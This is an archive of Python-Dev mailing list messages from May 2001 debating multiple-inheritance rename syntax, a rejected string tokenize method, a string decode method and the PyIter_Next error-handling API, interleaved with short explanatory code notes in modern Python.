Dubois wrote: > class X (Y rename foo as _sfoo, > bar as _sbar > ): Why not let us spell this as: class X(Y): from Y import foo as _sfoo, bar as _sbar ... Of course, then you can spell inheritance as class X: from Y import * Right? :) Jeff From nas@python.ca Thu May 3 20:05:37 2001 From: nas@python.ca (Neil Schemenauer) Date: Thu, 3 May 2001 12:05:37 -0700 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500 References: <20010503131714.D21814@inetnebr.com> Message-ID: <20010503120537.A13708@glacier.fnational.com> Jeff Epler wrote: > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > > class X (Y rename foo as _sfoo, > > bar as _sbar > > ): > > Why not let us spell this as: > class X(Y): > from Y import foo as _sfoo, bar as _sbar > ... This already has a meaning in Python. Paul's suggested syntax is pretty neat, IMHO. Neil From trentm@ActiveState.com Thu May 3 20:39:27 2001 From: trentm@ActiveState.com (Trent Mick) Date: Thu, 3 May 2001 12:39:27 -0700 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700 References: <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com> Message-ID: <20010503123927.B30837@ActiveState.com> On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote: > Jeff Epler wrote: > > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > > > class X (Y rename foo as _sfoo, > > > bar as _sbar > > > ): > > > > Why not let us spell this as: > > class X(Y): > > from Y import foo as _sfoo, bar as _sbar > > ... > > This already has a meaning in Python. Paul's suggested syntax is > pretty neat, IMHO. Ditto, but how do you separate the "rename" lists for multiple inheritance?
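Without any new syntax, current Python can approximate Paul's renaming by binding base-class functions to new names in the class body. This is the same idea as Jeremy's `Yfoo = Y.foo` spelling, and it works with several bases. Below is a minimal sketch with illustrative class names, including Paul's diamond in which `B` redefines `a1` and `C` inherits it from `A`.

```python
class Y:
    def foo(self):
        return "Y.foo"


class Z:
    def foo(self):
        return "Z.foo"


class X(Y, Z):
    # Approximates "Y rename foo as _yfoo" and "Z rename foo as _zfoo".
    _yfoo = Y.foo
    _zfoo = Z.foo

    def foo(self):
        return [self._yfoo(), self._zfoo()]


# Paul's diamond: B redefines a1, C inherits A's version.
class A:
    def a1(self):
        return "A.a1"


class B(A):
    def a1(self):
        return "B.a1"


class C(A):
    pass


class D(B, C):
    ba1 = B.a1  # B's redefinition
    ca1 = C.a1  # A's version, reached through C
```

This is not an Eiffel rename. The original name stays visible through the bases, and each alias is bound when the class body runs, so a subclass of `X` that overrides `foo` does not change what `_yfoo` refers to.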
class X (Y rename foo as _sfoo, bar as _sbar; Z): pass ^---- what to use here How about: class X(Y, Z): from Y inherit foo as _yfoo, bar as _ybar from Z inherit foo as _zfoo, bar as _zbar Hmmmmm. Don't know if I like that either. Just throwing out ideas. Trent -- Trent Mick TrentM@ActiveState.com From greg@cosc.canterbury.ac.nz Fri May 4 05:25:08 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 04 May 2001 16:25:08 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AF1827E.E730F5DE@lemburg.com> Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > I think it has to do with terminology: when I say "inherit" > I actually mean "the lookup is forwarded to the another object". Some OO languages munge together the instance and inheritance relationships, but Python isn't one of them. Using terminology that way in the context of Python is guaranteed to cause massive confusion! Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Fri May 4 05:58:20 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 04 May 2001 16:58:20 +1200 (NZST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz> pf@artcom-gmbh.de (Peter Funk): > * People will confuse this with calling > MyBaseClass.__getitem__(....) Given type/class/instance unification, that's exactly how it'll be implemented. So it's not confusion, it's insightful understanding! > This '::' operator is not at all that ugly Well, that's a matter of opinion. But I'll concede that it's less ugly than something like @ or $. 
But in any case, it's not going to mean quite the same thing in Python as it does in C++, so it might just confuse C++ people. What exactly *is* it going to mean in Python, anyway? Will it have a corresponding __magic__ method, and if so, what will it be called? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From mal@lemburg.com Fri May 4 09:40:17 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 10:40:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz> Message-ID: <3AF26AF1.780462E2@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > I think it has to do with terminology: when I say "inherit" > > I actually mean "the lookup is forwarded to another object". > > Some OO languages munge together the instance and inheritance > relationships, but Python isn't one of them. Using terminology > that way in the context of Python is guaranteed to cause > massive confusion! But that's exactly what I am trying to do here: separate the notion of how lookups work (inheritance) from how objects are created (instantiation) ! In Python instantiation binds the new object to the creating class and all failing lookups are directed from the object to the class. OTOH, the class - base-class lookup relationship doesn't have anything to do with creation of objects -- classes are simply bound to their base-classes per definition of the class in the sense that failing lookups are directed to the base-classes. Classes themselves are created by meta-classes. The lookup strategy between the two is defined by the meta-class. What I'm arguing for is that meta-classes should get complete control over how lookups and object creation are done.
However, this will only be possible by breaking the current automatic lookup scheme at the meta-class - class boundary since otherwise you'd run into endless loops during lookups (e.g. for many of the __xxx__ methods). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Fri May 4 10:04:08 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 11:04:08 +0200 Subject: [Python-Dev] "".tokenize() ? Message-ID: <3AF27088.DE495210@lemburg.com> Gustavo Niemeyer submitted a patch which adds a tokenize-like method to strings and Unicode: "one, two and three".tokenize([",", "and"]) -> ["one", " two ", "three"] I like this method -- should I review the code and then check it in ? PS: Haven't gotten any response regarding the .decode() method yet... should I take this as "no objections" ? -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@pythonware.com Fri May 4 10:57:19 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 11:57:19 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff> mal wrote: > Gustavo Niemeyer submitted a patch which adds a tokenize-like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1. method bloat. not exactly something you do every day, and when you do, it's a one-liner: def tokenize(string, ignore): return [word for word in re.findall(r"\w+", string) if word not in ignore] > PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? -0. method bloat.
we don't have asfloat methods on integers and asint methods on strings either... Cheers /F From mal@lemburg.com Fri May 4 11:16:16 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 12:16:16 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> Message-ID: <3AF28170.399C2A5@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1. method bloat. not exactly something you do every day, and > when you do, it's a one-liner: > > def tokenize(string, ignore): > [word for word in re.findall("\w+", string) if not word in ignore] This is not the same as what .tokenize() does: it cuts at each occurrence of a substring rather than at words as in your example (although I must say that list comprehension looks cool ;-). > > PS: Haven't gotten any response regarding the .decode() method yet... > > should I take this as "no objections" ? > > -0. method bloat. we don't have asfloat methods on integers and > asint methods on strings either... Well, we already have .encode() which interfaces to PyString_Encode(), but no Python API for getting at PyString_Decode(). This is what .decode() is for. Depending on the codecs you use, these two methods can be very useful, e.g. for "fixing" line-endings or hexifying strings. The codec concept can be used for far more applications than just converting from and to Unicode. About rich method APIs in general: I like having rich method APIs, since they make life easier (you don't have to reinvent the wheel every time you want a common job to be done). IMHO, too many methods can never hurt, but I'm probably alone with that POV.
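Fredrik's one-liner, as quoted above, has no return statement, so the function would always give back None. As MAL points out, it also filters out whole words instead of cutting at substrings. Below is a minimal corrected sketch of the word-based variant, included only for comparison. It assumes Python 3 syntax, and the name tokenize_words is illustrative rather than taken from the thread.

```python
import re

def tokenize_words(string, ignore):
    # Pull out runs of word characters, then drop any word listed in `ignore`.
    # Separators such as "," can never match here, because \w+ never yields them.
    return [word for word in re.findall(r"\w+", string) if word not in ignore]

print(tokenize_words("one, two and three", ["and"]))  # ['one', 'two', 'three']
```

Unlike the proposed .tokenize(), this version discards surrounding whitespace and punctuation entirely, which is exactly the behavioral difference MAL objects to.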
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@pythonware.com Fri May 4 11:50:06 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 12:50:06 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com> Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff> mal wrote: > > > "one, two and three".tokenize([",", "and"]) > > > -> ["one", " two ", "three"] > > > > > > I like this method -- should I review the code and then check it in ? > > > > -1. method bloat. not exactly something you do every day, and > > when you do, it's a one-liner: > > > > def tokenize(string, ignore): > > [word for word in re.findall("\w+", string) if not word in ignore] > > This is not the same as what .tokenize() does: it cut at each > occurrance of a substring rather than words as in your example oh, I didn't see the spaces. splitting on all substrings is even easier (but perhaps a bit more obscure, at least when written on one line): def tokenize(string, seps): return re.split("|".join(map(re.escape, seps)), string) Cheers /F From lkcl@samba-tng.org Fri May 4 12:31:29 2001 From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton) Date: Fri, 4 May 2001 13:31:29 +0200 Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn] Message-ID: <20010504133129.K26116@angua.rince.de> hi there, i thought it best to bring this to someone's attention. the forkingmixin code keeps track of its children, plus because it forks, there's no close_requests() to interfere with the operation of the child etc. etc. now, for some marginally bizarre reason, adding an extra base class - BaseServer - has, i believe (without proof, just a hunch), caused a bug in ThreadingMixIn to be more likely to occur. 
now, i wrote BaseServer in order to be able to overload this for a server that reads from a SQL server table and performs actions based on what it reads from there (the name of a host and the name of a python script to action on the host, from the database :) :) ... but i don't do threading. python is my first actual exposure to thread programming. does anyone have enough experience with threads to write something in less lines and less time than this message? all best, luke ----- Forwarded message from noreply@sourceforge.net ----- Delivered-To: lkcl@angua.rince.de Delivered-To: lkcl@samba.org To: noreply@sourceforge.net From: noreply@sourceforge.net Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn Date: Thu, 03 May 2001 16:26:12 -0700 Bugs item #417845, was updated on 2001-04-21 08:28 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470 Category: Python Library Group: None Status: Open Resolution: None Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Guido van Rossum (gvanrossum) Summary: Python 2.1: SocketServer.ThreadingMixIn Initial Comment: SocketServer.ThreadingMixIn does not work properly since it tries to close the socket of a request two times. From gward@python.net Fri May 4 19:12:44 2001 From: gward@python.net (Greg Ward) Date: Fri, 4 May 2001 14:12:44 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700 References: Message-ID: <20010504141244.A1167@gerg.ca> On 03 May 2001, Paul F. Dubois said: > 1. The simple case, X inherits from Y and in defining foo and bar needs to > use Y's version: > > class X (Y rename foo as _sfoo, > bar as _sbar > ): Maybe I'm being thick, but don't you get the same effect by doing this: class X (Y): _sfoo = Y.foo _sbar = Y.bar ...or would the "rename" syntax also hide the "foo" and "bar" names from X's effective namespace[1]? 
In that case, I guess some special syntax is needed. [1] "effective namespace" -- the union of X's class dict with all its superclass' dicts; not actually X's namespace, but the set of names you can use in X. I think. Err, whatever. Greg From gward@python.net Fri May 4 19:15:51 2001 From: gward@python.net (Greg Ward) Date: Fri, 4 May 2001 14:15:51 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200 References: <3AF27088.DE495210@lemburg.com> Message-ID: <20010504141551.B1167@gerg.ca> On 04 May 2001, M.-A. Lemburg said: > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? I concur with /F: -1 because you can do it easily with re.split(). Greg -- Greg Ward - Unix bigot gward@python.net http://starship.python.net/~gward/ I hope something GOOD came in the mail today so I have a REASON to live!! From guido@digicool.com Fri May 4 19:36:14 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:36:14 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT." <20010504141244.A1167@gerg.ca> References: <20010504141244.A1167@gerg.ca> Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com> > On 03 May 2001, Paul F. Dubois said: > > 1. The simple case, X inherits from Y and in defining foo and bar needs to > > use Y's version: > > > > class X (Y rename foo as _sfoo, > > bar as _sbar > > ): [Greg Ward] > Maybe I'm being thick, but don't you get the same effect by doing this: > > class X (Y): > _sfoo = Y.foo > _sbar = Y.bar > > ...or would the "rename" syntax also hide the "foo" and "bar" names from > X's effective namespace[1]? In that case, I guess some special syntax > is needed. 
Paul's point is that the rename thing makes it possible to deprecate the form Y.foo, which is causing the basic ambiguity here. > [1] "effective namespace" -- the union of X's class dict with all its > superclass' dicts; not actually X's namespace, but the set of names you > can use in X. I think. Err, whatever. Probably irrelevant. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Fri May 4 19:38:06 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:38:06 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT." <20010504141551.B1167@gerg.ca> References: <3AF27088.DE495210@lemburg.com> <20010504141551.B1167@gerg.ca> Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com> > On 04 May 2001, M.-A. Lemburg said: > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > I concur with /F: -1 because you can do it easily with re.split(). -1 also. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Fri May 4 19:51:26 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 4 May 2001 14:51:26 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: <3AF27088.DE495210@lemburg.com> Message-ID: [MAL] > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1 here. Easily enough done via other means, and you just *know* different people will want different variants of tokenization (e.g., nobody in their right mind will want " two " coming back from that example, and, given that it does, that it doesn't also return " three" is baffling). 
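The re.split() approach that Fredrik and Greg point to cuts at every occurrence of any separator. A minimal sketch, assuming Python 3. The helper names tokenize and tokenize_stripped are illustrative. The second helper is one of the "different variants" Tim expects people to want.

```python
import re

def tokenize(string, seps):
    # Escape each separator so characters like "." or "|" are matched literally.
    # Longest separators come first, so "<=" wins over its prefix "<".
    ordered = sorted(seps, key=len, reverse=True)
    pattern = "|".join(map(re.escape, ordered))
    return re.split(pattern, string)

def tokenize_stripped(string, seps):
    # Variant: trim whitespace from each piece and drop empty pieces.
    return [piece.strip() for piece in tokenize(string, seps) if piece.strip()]

print(tokenize("one, two and three", [",", "and"]))           # ['one', ' two ', ' three']
print(tokenize_stripped("one, two and three", [",", "and"]))  # ['one', 'two', 'three']
```

Splitting consistently gives " three" with its leading space, which is the consistency Tim found missing from the patch's example. Note also that a bare "and" separator would cut inside words such as "band". That is one more reason a single built-in method would struggle to satisfy everyone.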
> PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? +1 from me: it's the other half of the existing .encode() method, and the current lack of symmetry is icky. From barry@digicool.com Fri May 4 19:57:09 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Fri, 4 May 2001 14:57:09 -0400 Subject: [Python-Dev] Multiple inheritance References: <20010503131714.D21814@inetnebr.com> Message-ID: <15090.64389.746625.331215@anthem.wooz.org> >>>>> "JE" == Jeff Epler writes: >> class X (Y rename foo as _sfoo, bar as _sbar ): | Why not let us spell this as: | class X(Y): | from Y import foo as _sfoo, bar as _sbar | ... >>>>> "NS" == Neil Schemenauer writes: NS> This already has a meaning in Python. Paul's suggested syntax NS> is pretty neat, IMHO. Not if Y is a class though, right? That would currently raise an ImportError, so why not hijack it for this purpose? I think it has a natural and clear enough meaning without requiring additional keywords, or complicating the base class specification syntax. -Barry From tim.one@home.com Fri May 4 21:50:03 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 4 May 2001 16:50:03 -0400 Subject: [Python-Dev] Change to PyIter_Next()? Message-ID: In spare moments, I've been plugging away at making various functions work nice with iterators (map, min, max, etc). Over and over this requires writing code of the form: op2 = PyIter_Next(it); if (op2 == NULL) { /* StopIteration is *implied* by a NULL return from * PyIter_Next() if PyErr_Occurred() is false. */ if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else goto Fail; } break; } This is wordy, obscure, and in my experience is needed every time I call PyIter_Next(). So I'd like to hide this in PyIter_Next instead, like so: /* Return next item. * If an error occurs, return NULL and set *error=1. * If the iteration terminated normally, return NULL and set *error=0. 
* Else return the next object and set *error=0. */ PyObject * PyIter_Next(PyObject *iter, int *error) { PyObject *result; if (!PyIter_Check(iter)) { PyErr_Format(PyExc_TypeError, "'%.100s' object is not an iterator", iter->ob_type->tp_name); *error = 1; return NULL; } result = (*iter->ob_type->tp_iternext)(iter); *error = 0; if (result) return result; if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else *error = 1; } /* Else StopIteration is implicit, and there is no error. */ return NULL; } Then *calls* could be the simpler: op2 = PyIter_Next(it, &error); if (op2 == NULL) { if (error) goto Fail; break; } Objections? So far I'm almost the only user of PyIter_Next(); the only other use is in ceval's FOR_ITER, which goes thru a similar dance. However, I'm not clear on why FOR_ITER doesn't clear the exception if PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both true -- that sure smells like a bug (but, if so, the change above would squash it by magic). Note that I'm not proposing to change the signature of the tp_iternext slot similarly. PyIter_Next() is a (IMO appropriately) higher-level function. From guido@digicool.com Fri May 4 23:03:36 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 17:03:36 -0500 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400." References: Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> > In spare moments, I've been plugging away at making various functions work > nice with iterators (map, min, max, etc). For which efforts I extend my greatest thanks! > Over and over this requires writing code of the form: > [etc.] > > This is wordy, obscure, and in my experience is needed every time I call > PyIter_Next(). > > So I'd like to hide this in PyIter_Next instead, like so: > > /* Return next item. > * If an error occurs, return NULL and set *error=1.
> * If the iteration terminated normally, return NULL and set *error=0. > * Else return the next object and set *error=0. > */ > PyObject * > PyIter_Next(PyObject *iter, int *error) > { [etc.] > } > Then *calls* could be the simpler: > > op2 = PyIter_Next(it, &error); > if (op2 == NULL) { > if {error) > goto Fail; > break; > } I originally had this API for tp_iternext, and changed it to the current API because I got tired of having to declare the error variable. How about making PyIter_Next() call PyErr_Clear() when the exception is StopIteration? Then calls could be op2 = PyIter_Next(it); if (op2 == NULL) { if (PyErr_Occurred()) goto Fail; break; } This is a tad slower and arguably generates more code (assuming an extra call is slower than passing an extra argument and loading it) but doesn't require declaring the error variable. But since you're the customer, it's your choice. > Objections? So far I'm almost the only user of PyIter_Next(); the only other > use is in ceval's FOR_ITER, which goes thru a similar dance. > > However, I'm not clear on why FOR_ITER doesn't clear the exception if > PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both > true -- that sure smells like a bug (but, if so, the change above would > squash it by magic). Smells like a bug indeed. > Note that I'm not proposing to change the signature of the tp_iternext slot > similarly. PyIter_Next() is a (IMO appropriately) higher-level function. Agreed. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Fri May 4 22:18:16 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 4 May 2001 17:18:16 -0400 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> Message-ID: [Tim] >> In spare moments, I've been plugging away at ... iterators [Guido] > For which efforts I extend my greatest thanks! 
Yet but a pale reflection of the thanks I extend to you for implementing these guys to begin with: they're *loads* of fun! But not nearly as much fun as playing with Perl, so they're still prudently Pythonic . [T proposed adding a int* error arg to PyIter_Next()] [G] > How about making PyIter_Next() call PyErr_Clear() when the exception > is StopIteration? > > Then calls could be > > op2 = PyIter_Next(it); > if (op2 == NULL) { > if (PyErr_Occurred()) > goto Fail; > break; > } Perfect. I'll do that later tonight, and update the PEP to match. > This is a tad slower and arguably generates more code (assuming an > extra call is slower than passing an extra argument and loading it) > but doesn't require declaring the error variable. Well, it's two more calls (since PyErr_Occurred() also makes a call to get the thread state), but I don't really care because the client only does this in case of error or end-of-iteration (which aren't the normal cases). I was dreading finding a spare int var to pass inside FOR_ITER anyway . From paulp@ActiveState.com Sat May 5 01:03:05 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Fri, 04 May 2001 17:03:05 -0700 Subject: [Python-Dev] :: Message-ID: <3AF34339.9C553704@ActiveState.com> I'll throw out a partially formed thought in case it is useful to anybody. "::" might be useful to solve another problem I've been struggling with: how to have multiple package distributions share a namespace (xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). "::" might mean, in general, that you are walking through abstract, potentially merged namespaces and not through concrete dictionary implementations. I think that Python's using the same syntax for package namespaces and attribute accesses might seem more elegant than it is in practice. 
Things that "seem like" they should work do not because packages are fundamentally different than attributes: >>> from xml import dom.minidom File "", line 1 from xml import dom.minidom ^ SyntaxError: invalid syntax Why isn't this symmetric? I would like to use "." on either side of the import >>> import xml >>> print xml.dom Traceback (most recent call last): File "", line 1, in ? AttributeError: 'xml' module has no attribute 'dom' >>> from xml.dom import minidom >>> print xml.dom I find it a little bit weird that importing one module has the side effect of populating a package. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From guido@digicool.com Sat May 5 04:07:56 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 22:07:56 -0500 Subject: [Python-Dev] :: In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST." <3AF34339.9C553704@ActiveState.com> References: <3AF34339.9C553704@ActiveState.com> Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com> > I find it a little bit weird that importing one module has the side > effect of populating a package. That's just because you've seen too much Java. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Sat May 5 09:13:30 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sat, 05 May 2001 10:13:30 +0200 Subject: [Python-Dev] "".tokenize() ? References: Message-ID: <3AF3B62A.50DD4115@lemburg.com> Tim Peters wrote: > > [MAL] > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1 here. 
Easily enough done via other means, and you just *know* different > people will want different variants of tokenization (e.g., nobody in their > right mind will want " two " coming back from that example, and, given that > it does, that it doesn't also return " three" is baffling). Ok. I rejected the patch with a mild response to take on this by subclassing strings in Python 2.2 ;-) > > PS: Haven't gotten any response regarding the .decode() method yet... > > should I take this as "no objections" ? > > +1 from me: it's the other half of the existing .encode() method, and the > current lack of symmetry is icky. Right. If I hear no strong objections, I'll check in the .decode() method next week. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Sat May 5 12:45:26 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 06:45:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200." <3AF0662D.48671B4E@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com> > I've attached the patch. Due to a small reorganisation the > patch is a little longer -- symmetry has its price at C level > too ;-) Looks good on paper, so go ahead and check it in. Watch out for potential changes caused by Tim's iter-crusade! :-) While you're at it, why don't you check in the rot13 codec you posted -- it's good to have simple examples in the standard library. It would also be cool to have codecs for common file encodings like base64, quoted-printable, binhex, uuencode, and even hex (binascii.hexlify).
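The thread predates Python 3. In Python 3, str no longer has a .decode() method. The non-Unicode codecs discussed here, such as rot13 and hex, are reached through codecs.encode() and codecs.decode() instead. Here is a small sketch of the encode/decode symmetry MAL describes, assuming a current Python 3 interpreter.

```python
import codecs

# rot13 maps text to text, and applying it again undoes it.
secret = codecs.encode("Hello, Python-Dev", "rot_13")
print(secret)                           # Uryyb, Clguba-Qri
print(codecs.decode(secret, "rot_13"))  # Hello, Python-Dev

# hex maps bytes to bytes, like binascii.hexlify / unhexlify.
hexed = codecs.encode(b"spam", "hex")
print(hexed)                            # b'7370616d'
print(codecs.decode(hexed, "hex"))      # b'spam'
```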
--Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Sat May 5 13:15:52 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:15:52 -0500 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200." <3AF3B62A.50DD4115@lemburg.com> References: <3AF3B62A.50DD4115@lemburg.com> Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com> > Ok. I rejected the patch with a mild response to take on this by > subclassing strings in Python 2.2 ;-) Gustavo didn't take the rejection well. He contacted me asking for a better explanation, and we got into a bit of an argument about how much I must explain my decisions, but I think he understands now. > If I hear no strong objections, I'll check in the .decode() > method next week. Yes, see my previous reply. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Sat May 5 13:24:19 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:24:19 -0500 Subject: [Python-Dev] PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST." References: Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> In a checkin message, Tim wrote: > The full story for instance objects is pretty much unexplainable, because > instance_contains() tries its own flavor of iteration-based containment > testing first, and PySequence_Contains doesn't get a chance at it unless > instance_contains() blows up. A consequence is that > some_complex_number in some_instance > dies with a TypeError unless some_instance.__class__ defines __iter__ but > does not define __getitem__. This kind of thing happens everywhere -- instances always define all slots but using the slots sometimes fails when the corresponding __foo__ doesn't exist. Decisions based on the presence or absence of a slot are therefore in general not reliable; the only exception is the decision to *call* the slot or not.
The correct solution is not to catch AttributeError and pretend that the slot didn't exist (which would mask an AttributeError occurring inside the __contains__ method if there was one), but to reimplement the default behavior in the instance slot implementation. In this case, that means that PySequence_Contains() can be simplified (no need to test for AttributeError), and instance_contains() should fall back to a loop over iter(self) rather than trying to use instance_item(). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Sat May 5 21:40:11 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 5 May 2001 16:40:11 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > This kind of thing happens everywhere -- instances always define all > slots but using the slots sometimes fails when the corresponding > __foo__ doesn't exist. Decisions based on the presence or absence of > a slot are therefore in general not reliable; the only exception is > the decision to *call* the slot or not. The correct solution is not > to catch AttributeError and pretend that the slot didn't exist (which > would mask an AttributeError occurring inside the __contains__ method > if there was one), Ya, it sucks. I was inspired by that instance_contains() itself makes dubious assumptions about what an AttributeError means when the functions *it* calls raise it . > but to reimplement the default behavior in the instance slot > 